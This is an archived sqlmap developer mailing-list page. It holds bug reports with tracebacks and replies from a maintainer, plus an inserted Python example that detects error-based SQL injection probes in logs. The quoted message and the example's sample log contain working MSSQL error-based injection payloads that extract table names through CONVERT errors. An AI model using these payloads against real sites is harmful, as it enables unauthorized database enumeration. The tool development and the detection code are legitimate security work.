> ') AND 3792=CONVERT(INT,(SELECT TOP 1 name FROM sysobjects WHERE xtype =
> 'U')) -- - Works well - throws an error with a table name ("Conversion
> failed when converting the nvarchar value 'TABLE-NAME' to data type int.")
> ') AND 3792=CONVERT(INT,(SELECT TOP 1 'x:' + name FROM sysobjects WHERE
> xtype = 'U')) -- - Works well - throws an error with a table name
> ("Conversion failed when converting the nvarchar value 'x:TABLE-NAME' to
> data type int.")
> ') AND 3792=CONVERT(INT,'x:'+(SELECT TOP 1 name FROM sysobjects WHERE xtype
> = 'U')) -- - Doesn't work - just returns 'page not found' (not an 404 error,
> an error from the script telling that no rows were found)
>
> Can anyone test and confirm this? I'm not quite sure why that happens, but
> it seems like it can easily be fixed by adding the strings inside the
> sub-query (SELECT ':foo'+...+':bar:') instead of outside of it as it does
> now.
> Thanks

--
Miroslav Stampar
E-mail: miroslav.stampar (at) gmail.com
PGP Key ID: 0xB5397B1B
|
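Seen from the responder's side, the request and error message quoted in this exchange are enough to tell what a logged 500 response disclosed. The following is an added Python example, not sqlmap's code and not part of the original messages. The log records are constructed: the requests are shortened from the payloads quoted above, the `id=` parameter and the two plain response bodies are assumptions, and all function names are made up for the illustration.

```python
import re

# One or more CHAR(n) terms joined by '+', as used to build marker strings.
CHAR_CHAIN = re.compile(r"CHAR\(\s*\d+\s*\)(?:\s*\+\s*CHAR\(\s*\d+\s*\))*", re.I)
# CONVERT(INT, ... (SELECT: a subquery forced through an integer conversion.
CONVERT_PROBE = re.compile(r"CONVERT\s*\(\s*INT\s*,.*?\(\s*SELECT\b", re.I | re.S)
# The SQL Server message that echoes the converted value back to the client.
LEAK = re.compile(r"converting the \w+ value '(.*?)' to data type int", re.I | re.S)

# Constructed (request parameter, response body) records.
SAMPLE_LOG = [
    ("id=42", "<html>ok</html>"),
    ("id=1' AND 5424=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(112)+CHAR(121)+CHAR(58)+"
     "(SELECT TOP 1 name FROM sysobjects WHERE xtype IN (CHAR(117), CHAR(118)))"
     "+CHAR(58)+CHAR(106)+CHAR(110)+CHAR(116)+CHAR(58))) AND 'vVWe'='vVWe",
     "Conversion failed when converting the nvarchar value "
     "':ipy:dbo.users:jnt:' to data type int."),
    ("id=') AND 3792=CONVERT(INT,(SELECT TOP 1 name FROM sysobjects "
     "WHERE xtype = 'U')) -- -",
     "Conversion failed when converting the nvarchar value "
     "'TABLE-NAME' to data type int."),
    ("id=') AND 3792=CONVERT(INT,'x:'+(SELECT TOP 1 name FROM sysobjects "
     "WHERE xtype = 'U')) -- -",
     "No rows were found"),
]


def decode_char_chains(payload):
    """Return the literal string behind every CHAR(n)+CHAR(n)+... chain."""
    decoded = []
    for match in CHAR_CHAIN.finditer(payload):
        codes = [int(n) for n in re.findall(r"\d+", match.group(0))]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def analyse(request, response):
    """Classify one record: was it a conversion probe, which delimiter
    markers did it carry, and what value did the error message echo?"""
    markers = [s for s in decode_char_chains(request) if len(s) >= 3]
    match = LEAK.search(response)
    leaked = match.group(1) if match else None
    if leaked is not None and len(markers) >= 2:
        head, tail = markers[0], markers[-1]
        if leaked.startswith(head) and leaked.endswith(tail):
            leaked = leaked[len(head):len(leaked) - len(tail)]
    return {"probe": bool(CONVERT_PROBE.search(request)),
            "markers": markers, "leaked": leaked}


def triage(records):
    """Keep only records that probed or disclosed something."""
    findings = []
    for request, response in records:
        finding = analyse(request, response)
        if finding["probe"] or finding["leaked"] is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for item in triage(SAMPLE_LOG):
        print(item)
```

A non-empty `leaked` field means the detailed database error reached the client; serving a generic error page and logging the detail server-side closes that channel.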
From: Bernardo D. A. G. <ber...@gm...> - 2011-05-08 02:10:04
|
Please find it fixed now, r3860. Thanks for reporting. Bernardo On 7 May 2011 17:36, ultramegaman <sec...@ul...> wrote: > Rev. 3854 > I was running it in a screen session, so I'm missing the top part of > the error message. The only command-line flag given was --dump-all > Sorry I can't be more helpful. > > > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File 
"/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File 
"/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1683, in dumpAll > data = self.dumpTable() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1395, in dumpTable > return self.dumpAll() > File "/tmp/sqlmap-dev/plugins/generic/enumeration.py", line 1663, in dumpAll > logger.info(infoMsg) > File "/usr/lib/python2.6/logging/__init__.py", line 1056, in info > self._log(INFO, msg, args, **kwargs) > File "/usr/lib/python2.6/logging/__init__.py", line 1173, in _log > self.handle(record) > File "/usr/lib/python2.6/logging/__init__.py", line 1183, in handle > self.callHandlers(record) > File "/usr/lib/python2.6/logging/__init__.py", line 1220, in callHandlers > hdlr.handle(record) > File "/usr/lib/python2.6/logging/__init__.py", line 679, in handle > self.emit(record) > File "/usr/lib/python2.6/logging/__init__.py", line 804, in emit > self.handleError(record) > File "/usr/lib/python2.6/logging/__init__.py", line 733, in handleError > traceback.print_exception(ei[0], ei[1], ei[2], None, sys.stderr) > File "/usr/lib/python2.6/traceback.py", line 125, in print_exception > print_tb(tb, limit, file) > File "/usr/lib/python2.6/traceback.py", line 57, in print_tb > if hasattr(sys, 'tracebacklimit'): > AttributeError: 'module' object has no attribute 'tracebacklimit' -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) PGP Key ID: 0x05F5A30F |
From: Bernardo D. A. G. <ber...@gm...> - 2011-05-07 21:22:39
|
Find it fixed in the last commit, r3857.
Thanks for reporting.

Bernardo

On 7 May 2011 14:20, Alexander Hagenah <ah...@pr...> wrote:
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> sqlmap version: 1.0-dev (r3854)
> Python version: 2.6.6
> Operating system: posix
> Command line: ./sqlmap.py -u
> ***********************************************************************
> - --is-dba
> Technique: UNION
> Back-end DBMS: Microsoft Access (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 83, in main
>     start()
>   File "/home/tools/sqlmap/lib/controller/controller.py", line 494, in start
>     action()
>   File "/home/tools/sqlmap/lib/controller/action.py", line 70, in action
>     conf.dumper.dba(conf.dbmsHandler.isDba())
>   File "/home/tools/sqlmap/plugins/generic/enumeration.py", line 151, in isDba
>     query = queries[Backend.getIdentifiedDbms()].is_dba.query
>   File "/home/tools/sqlmap/extra/xmlobject/xmlobject.py", line 372, in __getattr__
>     raise AttributeError(attr)
> AttributeError: query
>
> [*] shutting down at: 16:00:39
>
> - --
> Alexander Hagenah
>
> Dubai, UAE.
> Mobile: +971 (0)50 6448151
>
> Key ID (2048bit): 0x354C0DDB
> Fingerprint: FBA1 439F 7343 3729 18AF D62C 54DE FD22 354C 0DDB
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.11 (GNU/Linux)
>
> iEYEARECAAYFAk3FRy4ACgkQVN79IjVMDdvRcgCgpnYcNTfobHClUHVj2bsZIiaM
> yLsAn14wNdKJopF0FTFLa9uKxmVXivdn
> =B6C6
> -----END PGP SIGNATURE-----

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F
|